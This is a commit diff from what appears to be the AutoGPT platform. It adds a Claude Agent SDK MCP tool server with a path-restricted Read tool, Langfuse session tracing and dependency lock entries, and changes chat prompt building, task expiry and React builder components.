# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
# Security: only allow reads under the SDK's working directory
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -0,0 +1,429 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.model = model
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model=self.model or "claude-sonnet-4-20250514",
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt, model=model)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks:
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
result[event_name].extend(matchers)
return result

View File

@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
async def _build_system_prompt(
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available.
Args:
user_id: The user ID for fetching business understanding
If "default" and this is the user's first session, will use "onboarding" instead.
user_id: The user ID for fetching business understanding.
has_conversation_history: Whether there's existing conversation history.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
Returns:
Tuple of (compiled prompt string, business understanding object)
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
if understanding:
context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -374,7 +380,6 @@ async def stream_chat_completion(
Raises:
NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
"""
completion_start = time.monotonic()
@@ -459,8 +464,9 @@ async def stream_chat_completion(
# Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message
if is_user_message and message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
user_messages = [m for m in session.messages if m.role == "user"]
first_user_msg = message or (user_messages[0].content if user_messages else None)
if is_user_message and first_user_msg and not session.title:
if len(user_messages) == 1:
# First user message - generate title in background
import asyncio
@@ -468,7 +474,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session
captured_session_id = session_id
captured_message = message
captured_message = first_user_msg
captured_user_id = user_id
async def _update_title():
@@ -800,13 +806,9 @@ async def stream_chat_completion(
# Build the messages list in the correct order
messages_to_save: list[ChatMessage] = []
# Add assistant message with tool_calls if any.
# Use extend (not assign) to preserve tool_calls already added by
# _yield_tool_call for long-running tools.
# Add assistant message with tool_calls if any
if accumulated_tool_calls:
if not assistant_response.tool_calls:
assistant_response.tool_calls = []
assistant_response.tool_calls.extend(accumulated_tool_calls)
assistant_response.tool_calls = accumulated_tool_calls
logger.info(
f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
)
@@ -1237,7 +1239,7 @@ async def _stream_chat_chunks(
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)
@@ -1408,9 +1410,13 @@ async def _yield_tool_call(
operation_id=operation_id,
)
# Attach the tool_call to the current turn's assistant message
# (or create one if this is a tool-only response with no text).
session.add_tool_call_to_current_turn(tool_calls[yield_idx])
# Save assistant message with tool_call FIRST (required by LLM)
assistant_message = ChatMessage(
role="assistant",
content="",
tool_calls=[tool_calls[yield_idx]],
)
session.messages.append(assistant_message)
# Then save pending tool result
pending_message = ChatMessage(

View File

@@ -814,6 +814,28 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id:
continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id)
last_id = "0-0"

View File

@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any]
output_schema: dict[str, Any]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of required input fields for this block",
description="List of input fields for this block",
)
@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the required fields from input_schema."
"'id' field and input_data containing the fields listed in required_inputs."
)

View File

@@ -897,6 +897,29 @@ files = [
{file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"},
]
[[package]]
name = "claude-agent-sdk"
version = "0.1.35"
description = "Python SDK for Claude Code"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "claude_agent_sdk-0.1.35-py3-none-macosx_11_0_arm64.whl", hash = "sha256:df67f4deade77b16a9678b3a626c176498e40417f33b04beda9628287f375591"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:14963944f55ded7c8ed518feebfa5b4284aa6dd8d81aeff2e5b21a962ce65097"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:84344dcc535d179c1fc8a11c6f34c37c3b583447bdf09d869effb26514fd7a65"},
{file = "claude_agent_sdk-0.1.35-py3-none-win_amd64.whl", hash = "sha256:1b3d54b47448c93f6f372acd4d1757f047c3c1e8ef5804be7a1e3e53e2c79a5f"},
{file = "claude_agent_sdk-0.1.35.tar.gz", hash = "sha256:0f98e2b3c71ca85abfc042e7a35c648df88e87fda41c52e6779ef7b038dcbb52"},
]
[package.dependencies]
anyio = ">=4.0.0"
mcp = ">=0.1.0"
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
[package.extras]
dev = ["anyio[trio] (>=4.0.0)", "mypy (>=1.0.0)", "pytest (>=7.0.0)", "pytest-asyncio (>=0.20.0)", "pytest-cov (>=4.0.0)", "ruff (>=0.1.0)"]
[[package]]
name = "cleo"
version = "2.1.0"
@@ -2593,6 +2616,18 @@ http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"]
zstd = ["zstandard (>=0.18.0)"]
[[package]]
name = "httpx-sse"
version = "0.4.3"
description = "Consume Server-Sent Event (SSE) messages with HTTPX."
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "httpx_sse-0.4.3-py3-none-any.whl", hash = "sha256:0ac1c9fe3c0afad2e0ebb25a934a59f4c7823b60792691f779fad2c5568830fc"},
{file = "httpx_sse-0.4.3.tar.gz", hash = "sha256:9b1ed0127459a66014aec3c56bebd93da3c1bc8bb6618c8082039a44889a755d"},
]
[[package]]
name = "huggingface-hub"
version = "1.4.1"
@@ -3310,6 +3345,39 @@ files = [
{file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"},
]
[[package]]
name = "mcp"
version = "1.26.0"
description = "Model Context Protocol SDK"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca"},
{file = "mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66"},
]
[package.dependencies]
anyio = ">=4.5"
httpx = ">=0.27.1"
httpx-sse = ">=0.4"
jsonschema = ">=4.20.0"
pydantic = ">=2.11.0,<3.0.0"
pydantic-settings = ">=2.5.2"
pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
python-multipart = ">=0.0.9"
pywin32 = {version = ">=310", markers = "sys_platform == \"win32\""}
sse-starlette = ">=1.6.1"
starlette = ">=0.27"
typing-extensions = ">=4.9.0"
typing-inspection = ">=0.4.1"
uvicorn = {version = ">=0.31.1", markers = "sys_platform != \"emscripten\""}
[package.extras]
cli = ["python-dotenv (>=1.0.0)", "typer (>=0.16.0)"]
rich = ["rich (>=13.9.4)"]
ws = ["websockets (>=15.0.1)"]
[[package]]
name = "mdurl"
version = "0.1.2"
@@ -5994,7 +6062,7 @@ description = "Python for Window Extensions"
optional = false
python-versions = "*"
groups = ["main"]
markers = "platform_system == \"Windows\""
markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
files = [
{file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"},
{file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"},
@@ -6974,6 +7042,28 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
[[package]]
name = "sse-starlette"
version = "3.2.0"
description = "SSE plugin for Starlette"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "sse_starlette-3.2.0-py3-none-any.whl", hash = "sha256:5876954bd51920fc2cd51baee47a080eb88a37b5b784e615abb0b283f801cdbf"},
{file = "sse_starlette-3.2.0.tar.gz", hash = "sha256:8127594edfb51abe44eac9c49e59b0b01f1039d0c7461c6fd91d4e03b70da422"},
]
[package.dependencies]
anyio = ">=4.7.0"
starlette = ">=0.49.1"
[package.extras]
daphne = ["daphne (>=4.2.0)"]
examples = ["aiosqlite (>=0.21.0)", "fastapi (>=0.115.12)", "sqlalchemy[asyncio] (>=2.0.41)", "uvicorn (>=0.34.0)"]
granian = ["granian (>=2.3.1)"]
uvicorn = ["uvicorn (>=0.34.0)"]
[[package]]
name = "stagehand"
version = "0.5.9"
@@ -8440,4 +8530,4 @@ cffi = ["cffi (>=1.17,<2.0) ; platform_python_implementation != \"PyPy\" and pyt
[metadata]
lock-version = "2.1"
python-versions = ">=3.10,<3.14"
content-hash = "c06e96ad49388ba7a46786e9ea55ea2c1a57408e15613237b4bee40a592a12af"
content-hash = "942dea6daf671c3be65a22f3445feda26c1af9409d7173765e9a0742f0aa05dc"

View File

@@ -16,6 +16,7 @@ anthropic = "^0.79.0"
apscheduler = "^3.11.1"
autogpt-libs = { path = "../autogpt_libs", develop = true }
bleach = { extras = ["css"], version = "^6.2.0" }
claude-agent-sdk = "^0.1.0"
click = "^8.2.0"
cryptography = "^46.0"
discord-py = "^2.5.2"

View File

@@ -0,0 +1,31 @@
"use client";
import { Tabs, TabsList, TabsTrigger } from "@/components/__legacy__/ui/tabs";
export type BuilderView = "old" | "new";
export function BuilderViewTabs({
value,
onChange,
}: {
value: BuilderView;
onChange: (value: BuilderView) => void;
}) {
return (
<div className="pointer-events-auto fixed right-4 top-20 z-50">
<Tabs
value={value}
onValueChange={(v: string) => onChange(v as BuilderView)}
>
<TabsList className="w-fit bg-zinc-900">
<TabsTrigger value="old" className="text-gray-100">
Old
</TabsTrigger>
<TabsTrigger value="new" className="text-gray-100">
New
</TabsTrigger>
</TabsList>
</Tabs>
</div>
);
}

View File

@@ -23,9 +23,6 @@ import { useCopyPaste } from "./useCopyPaste";
import { useFlow } from "./useFlow";
import { useFlowRealtime } from "./useFlowRealtime";
import "@xyflow/react/dist/style.css";
import "./flow.css";
export const Flow = () => {
const [{ flowID, flowExecutionID }] = useQueryStates({
flowID: parseAsString,

View File

@@ -1,9 +0,0 @@
/* Reset default xyflow handle styles so custom Phosphor icon handles render correctly */
.react-flow__handle {
background: transparent;
width: auto;
height: auto;
border: 0;
position: relative;
transform: none;
}

View File

@@ -1,30 +1,100 @@
// import { Separator } from "@/components/__legacy__/ui/separator";
import { cn } from "@/lib/utils";
import React, { memo } from "react";
import { BlockMenu } from "./NewBlockMenu/BlockMenu/BlockMenu";
import { useNewControlPanel } from "./useNewControlPanel";
// import { NewSaveControl } from "../SaveControl/NewSaveControl";
import { GraphExecutionID } from "@/lib/autogpt-server-api";
// import { ControlPanelButton } from "../ControlPanelButton";
// import { GraphSearchMenu } from "../GraphMenu/GraphMenu";
import { Separator } from "@/components/__legacy__/ui/separator";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { CustomNode } from "../FlowEditor/nodes/CustomNode/CustomNode";
import { NewSaveControl } from "./NewSaveControl/NewSaveControl";
import { UndoRedoButtons } from "./UndoRedoButtons";
export const NewControlPanel = memo(() => {
useNewControlPanel({});
export type Control = {
icon: React.ReactNode;
label: string;
disabled?: boolean;
onClick: () => void;
};
return (
<section
className={cn(
"absolute left-4 top-10 z-10 overflow-hidden rounded-[1rem] border-none bg-white p-0 shadow-[0_1px_5px_0_rgba(0,0,0,0.1)]",
)}
>
<div className="flex flex-col items-center justify-center rounded-[1rem] p-0">
<BlockMenu />
<Separator className="text-[#E1E1E1]" />
<NewSaveControl />
<Separator className="text-[#E1E1E1]" />
<UndoRedoButtons />
</div>
</section>
);
});
export type NewControlPanelProps = {
flowExecutionID?: GraphExecutionID | undefined;
visualizeBeads?: "no" | "static" | "animate";
pinSavePopover?: boolean;
pinBlocksPopover?: boolean;
nodes?: CustomNode[];
onNodeSelect?: (nodeId: string) => void;
onNodeHover?: (nodeId: string) => void;
};
export const NewControlPanel = memo(
({
flowExecutionID: _flowExecutionID,
visualizeBeads: _visualizeBeads,
pinSavePopover: _pinSavePopover,
pinBlocksPopover: _pinBlocksPopover,
nodes: _nodes,
onNodeSelect: _onNodeSelect,
onNodeHover: _onNodeHover,
}: NewControlPanelProps) => {
const _isGraphSearchEnabled = useGetFlag(Flag.GRAPH_SEARCH);
const {
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
} = useNewControlPanel({});
return (
<section
className={cn(
"absolute left-4 top-10 z-10 overflow-hidden rounded-[1rem] border-none bg-white p-0 shadow-[0_1px_5px_0_rgba(0,0,0,0.1)]",
)}
>
<div className="flex flex-col items-center justify-center rounded-[1rem] p-0">
<BlockMenu />
{/* <Separator className="text-[#E1E1E1]" />
{isGraphSearchEnabled && (
<>
<GraphSearchMenu
nodes={nodes}
blockMenuSelected={blockMenuSelected}
setBlockMenuSelected={setBlockMenuSelected}
onNodeSelect={onNodeSelect}
onNodeHover={onNodeHover}
/>
<Separator className="text-[#E1E1E1]" />
</>
)}
{controls.map((control, index) => (
<ControlPanelButton
key={index}
onClick={() => control.onClick()}
data-id={`control-button-${index}`}
data-testid={`blocks-control-${control.label.toLowerCase()}-button`}
disabled={control.disabled || false}
className="rounded-none"
>
{control.icon}
</ControlPanelButton>
))} */}
<Separator className="text-[#E1E1E1]" />
<NewSaveControl />
<Separator className="text-[#E1E1E1]" />
<UndoRedoButtons />
</div>
</section>
);
},
);
export default NewControlPanel;

View File

@@ -1,4 +1,4 @@
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import {
Popover,
PopoverContent,

View File

@@ -1,5 +1,5 @@
import { useGraphSearch } from "../GraphMenuSearchBar/useGraphMenuSearchBar";
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
interface UseGraphMenuProps {
nodes: CustomNode[];

View File

@@ -1,7 +1,7 @@
import React from "react";
import { Separator } from "@/components/__legacy__/ui/separator";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { beautifyString, categoryColorMap } from "@/lib/utils";
import { beautifyString, getPrimaryCategoryColor } from "@/lib/utils";
import { SearchableNode } from "../GraphMenuSearchBar/useGraphMenuSearchBar";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import {
@@ -73,12 +73,14 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
}
const nodeTitle =
(node.data?.metadata?.customized_name as string) ||
beautifyString(node.data?.title || "").replace(/ Block$/, "");
const nodeType = beautifyString(node.data?.title || "").replace(
